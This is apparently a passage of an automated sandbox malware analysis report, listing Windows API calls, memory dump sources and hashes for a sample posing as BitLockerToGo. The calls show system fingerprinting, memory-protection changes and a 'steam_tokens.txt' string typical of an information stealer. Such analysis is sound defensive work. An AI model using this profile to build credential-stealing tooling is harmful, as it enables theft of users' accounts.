                                                                                                                                                                  • Part of subcall function 030177C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0301DBC0,000000FF,?,03011C99,00000000,?,035559B0,00000000,?), ref: 030177F2
                                                                                                                                                                  • Part of subcall function 030177C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0301DBC0,000000FF,?,03011C99,00000000,?,035559B0,00000000,?), ref: 030177F9
                                                                                                                                                                  • Part of subcall function 03017850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,030011B7), ref: 03017880
                                                                                                                                                                  • Part of subcall function 03017850: RtlAllocateHeap.NTDLL(00000000), ref: 03017887
                                                                                                                                                                  • Part of subcall function 03017850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0301789F
                                                                                                                                                                  • Part of subcall function 030178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,03016A2B), ref: 03017910
                                                                                                                                                                  • Part of subcall function 030178E0: RtlAllocateHeap.NTDLL(00000000), ref: 03017917
                                                                                                                                                                  • Part of subcall function 030178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0301792F
                                                                                                                                                                  • Part of subcall function 03017980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,03020E00,00000000,?), ref: 030179B0
                                                                                                                                                                  • Part of subcall function 03017980: RtlAllocateHeap.NTDLL(00000000), ref: 030179B7
                                                                                                                                                                  • Part of subcall function 03017980: GetLocalTime.KERNEL32(?,?,?,?,?,03020E00,00000000,?), ref: 030179C4
                                                                                                                                                                  • Part of subcall function 03017980: wsprintfA.USER32 ref: 030179F3
                                                                                                                                                                  • Part of subcall function 03017A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,03555F28,00000000,?,03020E10,00000000,?,00000000,00000000), ref: 03017A63
                                                                                                                                                                  • Part of subcall function 03017A30: RtlAllocateHeap.NTDLL(00000000), ref: 03017A6A
                                                                                                                                                                  • Part of subcall function 03017A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,03555F28,00000000,?,03020E10,00000000,?,00000000,00000000,?), ref: 03017A7D
                                                                                                                                                                  • Part of subcall function 03017B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,03555F28,00000000,?,03020E10,00000000,?,00000000,00000000), ref: 03017B35
                                                                                                                                                                  • Part of subcall function 03017B90: GetKeyboardLayoutList.USER32(00000000,00000000,030205AF), ref: 03017BE1
                                                                                                                                                                  • Part of subcall function 03017B90: LocalAlloc.KERNEL32(00000040,?), ref: 03017BF9
                                                                                                                                                                  • Part of subcall function 03017B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 03017C0D
                                                                                                                                                                  • Part of subcall function 03017B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 03017C62
                                                                                                                                                                  • Part of subcall function 03017B90: LocalFree.KERNEL32(00000000), ref: 03017D22
                                                                                                                                                                  • Part of subcall function 03017D80: GetSystemPowerStatus.KERNEL32(?), ref: 03017DAD
                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000000,?,03555890,00000000,?,03020E24,00000000,?,00000000,00000000,?,03555F88,00000000,?,03020E20,00000000), ref: 0301207E
                                                                                                                                                                  • Part of subcall function 03019470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 03019484
                                                                                                                                                                  • Part of subcall function 03019470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 030194A5
                                                                                                                                                                  • Part of subcall function 03019470: CloseHandle.KERNEL32(00000000), ref: 030194AF
                                                                                                                                                                  • Part of subcall function 03017E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 03017E37
                                                                                                                                                                  • Part of subcall function 03017E00: RtlAllocateHeap.NTDLL(00000000), ref: 03017E3E
                                                                                                                                                                  • Part of subcall function 03017E00: RegOpenKeyExA.KERNEL32(80000002,03551230,00000000,00020119,?), ref: 03017E5E
                                                                                                                                                                  • Part of subcall function 03017E00: RegQueryValueExA.KERNEL32(?,03555970,00000000,00000000,000000FF,000000FF), ref: 03017E7F
                                                                                                                                                                  • Part of subcall function 03017E00: RegCloseKey.ADVAPI32(?), ref: 03017E92
                                                                                                                                                                  • Part of subcall function 03017F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 03017FC9
                                                                                                                                                                  • Part of subcall function 03017F60: GetLastError.KERNEL32 ref: 03017FD8
                                                                                                                                                                  • Part of subcall function 03017ED0: GetSystemInfo.KERNEL32(03020E2C), ref: 03017F00
                                                                                                                                                                  • Part of subcall function 03017ED0: wsprintfA.USER32 ref: 03017F16
                                                                                                                                                                  • Part of subcall function 03018100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,03555F10,00000000,?,03020E2C,00000000,?,00000000), ref: 03018130
                                                                                                                                                                  • Part of subcall function 03018100: RtlAllocateHeap.NTDLL(00000000), ref: 03018137
                                                                                                                                                                  • Part of subcall function 03018100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 03018158
                                                                                                                                                                  • Part of subcall function 03018100: __aulldiv.LIBCMT ref: 03018172
                                                                                                                                                                  • Part of subcall function 03018100: __aulldiv.LIBCMT ref: 03018180
                                                                                                                                                                  • Part of subcall function 03018100: wsprintfA.USER32 ref: 030181AC
                                                                                                                                                                  • Part of subcall function 030187C0: CreateDCA.GDI32(03540598,00000000,00000000,00000000), ref: 030187F5
                                                                                                                                                                  • Part of subcall function 030187C0: GetDeviceCaps.GDI32(?,00000008), ref: 03018804
                                                                                                                                                                  • Part of subcall function 030187C0: GetDeviceCaps.GDI32(?,0000000A), ref: 03018813
                                                                                                                                                                  • Part of subcall function 030187C0: ReleaseDC.USER32(00000000,?), ref: 03018822
                                                                                                                                                                  • Part of subcall function 030187C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,03020E28,00000000,?), ref: 0301882F
                                                                                                                                                                  • Part of subcall function 030187C0: RtlAllocateHeap.NTDLL(00000000), ref: 03018836
                                                                                                                                                                  • Part of subcall function 030187C0: wsprintfA.USER32 ref: 03018850
                                                                                                                                                                  • Part of subcall function 030181F0: EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000001), ref: 03018254
                                                                                                                                                                  • Part of subcall function 03018320: RegOpenKeyExA.KERNEL32(00000000,035533D0,00000000,00020019,00000000,030205B6), ref: 030183A4
                                                                                                                                                                  • Part of subcall function 03018320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 03018426
                                                                                                                                                                  • Part of subcall function 03018320: wsprintfA.USER32 ref: 03018459
                                                                                                                                                                  • Part of subcall function 03018320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0301847B
                                                                                                                                                                  • Part of subcall function 03018320: RegCloseKey.ADVAPI32(00000000), ref: 0301848C
                                                                                                                                                                  • Part of subcall function 03018320: RegCloseKey.ADVAPI32(00000000), ref: 03018499
                                                                                                                                                                  • Part of subcall function 03018680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,030205B7), ref: 030186CA
                                                                                                                                                                  • Part of subcall function 03018680: Process32First.KERNEL32(?,00000128), ref: 030186DE
                                                                                                                                                                  • Part of subcall function 03018680: Process32Next.KERNEL32(?,00000128), ref: 030186F3
                                                                                                                                                                  • Part of subcall function 03018680: CloseHandle.KERNEL32(?), ref: 03018761
                                                                                                                                                                • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0301265B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap$Process$Allocate$Closewsprintf$NameOpenlstrcpy$InformationLocal$CapsCreateCurrentDeviceEnumHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$AllocComputerDefaultDevicesDirectoryDisplayErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQueryReleaseSnapshotToolhelp32ValueVolumeWindowsWow64Zone
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2572046482-0
                                                                                                                                                                • Opcode ID: f6803d2ee4b0baf71b181544c1e7aa13dec09ae94ea0f23dde615e1451a2368a
                                                                                                                                                                • Instruction ID: 0738ca92d90e8cd7df5356625fda7a692799daff293b9768d903c783efed8127
                                                                                                                                                                • Opcode Fuzzy Hash: f6803d2ee4b0baf71b181544c1e7aa13dec09ae94ea0f23dde615e1451a2368a
                                                                                                                                                                • Instruction Fuzzy Hash: B072657AD13218ABDB19FB50ED90EDE733CAF94210F508299A1176A050EF707B5ACF64
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualProtect.KERNEL32(E9FC458B,087400FC,@Jn,@Jn), ref: 03006C9F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                • String ID: @Jn
                                                                                                                                                                • API String ID: 544645111-793231106
                                                                                                                                                                • Opcode ID: 4e61fd552be201176b232decaae58ec40280291e8d7316251b2aeec3c175ed94
                                                                                                                                                                • Instruction ID: aa26231b951dc13dedc52f054e09fb40654c9287471be2e6a5572707564f1b44
                                                                                                                                                                • Opcode Fuzzy Hash: 4e61fd552be201176b232decaae58ec40280291e8d7316251b2aeec3c175ed94
                                                                                                                                                                • Instruction Fuzzy Hash: D321EA74A0120CEFEB44CF89C594BADBBB2FF48304F148599D5559B381D7369A91CF80
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: ef4cf1024f8c897b80978164d31adf7b1db87c1ee56f7735b024cf68c084aa27
                                                                                                                                                                • Instruction ID: 9809abc451bb094ac7653251ab047222cf4ecc0fb66f7765f0a879b4ace48313
                                                                                                                                                                • Opcode Fuzzy Hash: ef4cf1024f8c897b80978164d31adf7b1db87c1ee56f7735b024cf68c084aa27
                                                                                                                                                                • Instruction Fuzzy Hash: CA6115B490121CDBEB14CF94D984BEEB7B1EB44304F148598E41AAB280D736ABA4CF91
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                  • Part of subcall function 0301A820: lstrlen.KERNEL32(00000000,?,?,03015B54,03020ADB,03020ADA,?,?,03016B16,00000000,?,03540578,?,0302110C,?,00000000), ref: 0301A82B
                                                                                                                                                                  • Part of subcall function 0301A820: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A885
                                                                                                                                                                • lstrlen.KERNEL32(00000000,00000000,03020ACA,?,?,?,?,?,?,0301610B,?), ref: 0301512A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcpylstrlen
                                                                                                                                                                • String ID: steam_tokens.txt
                                                                                                                                                                • API String ID: 2001356338-401951677
                                                                                                                                                                • Opcode ID: fb1c638687aa60581a2b20de4cadcf9236c982449330968bcce80e7cd13b557d
                                                                                                                                                                • Instruction ID: cf4d2b283db1a06c5e4075220c37ceb0b96af59130463c157eafb0d761a357ea
                                                                                                                                                                • Opcode Fuzzy Hash: fb1c638687aa60581a2b20de4cadcf9236c982449330968bcce80e7cd13b557d
                                                                                                                                                                • Instruction Fuzzy Hash: 65F06D3AA4320866DB08F7B0ED559ED773C9B94210F804128A4126E480EF34672AC7A1
                                                                                                                                                                APIs
                                                                                                                                                                • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03016A17,03020AEF), ref: 0300116A
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 0300117E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitInfoProcessSystem
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 752954902-0
                                                                                                                                                                • Opcode ID: 0bd171d6c86b6a24e0f6f53f1f3e731d0a6bb3589d387311ef86645ed4c6578a
                                                                                                                                                                • Instruction ID: fd86e55cf88d53bfadebec0238851e73bc238aea7f1e4d5073e88d7288cbf616
                                                                                                                                                                • Opcode Fuzzy Hash: 0bd171d6c86b6a24e0f6f53f1f3e731d0a6bb3589d387311ef86645ed4c6578a
                                                                                                                                                                • Instruction Fuzzy Hash: AFD05E78D4030CDBDB14EFE4E94D6DDBB78FB08311F000594E90562340EB306481CAA5
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrlen.KERNEL32(?,03021110,?,00000000,03020AEF), ref: 0301A9C5
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcpy.KERNEL32(00000000), ref: 0301AA04
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0301AA12
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcpy.KERNEL32(00000000,?), ref: 0301A972
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcat.KERNEL32(00000000), ref: 0301A982
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                  • Part of subcall function 0301A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0301A7E6
                                                                                                                                                                  • Part of subcall function 03009E10: memcmp.MSVCRT(?,v20,00000003), ref: 03009E2D
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 0300B9C2
                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 0300B9D6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcpy$lstrlen$lstrcat$memcmp
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3457870978-0
                                                                                                                                                                • Opcode ID: da3540abb5b9e05f122061a1a8bb700eb59d4a0dd6358463930fe1db6811fb5a
                                                                                                                                                                • Instruction ID: 5e26a6782d4ec49fb8f1a4e98e0ec29743ce15058bc48667c63b7e41f9e01a00
                                                                                                                                                                • Opcode Fuzzy Hash: da3540abb5b9e05f122061a1a8bb700eb59d4a0dd6358463930fe1db6811fb5a
                                                                                                                                                                • Instruction Fuzzy Hash: 18E1007AA132189BDF19FBA0DD94EEE733CBF94210F404159E5066B090EF746B5ACB60
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
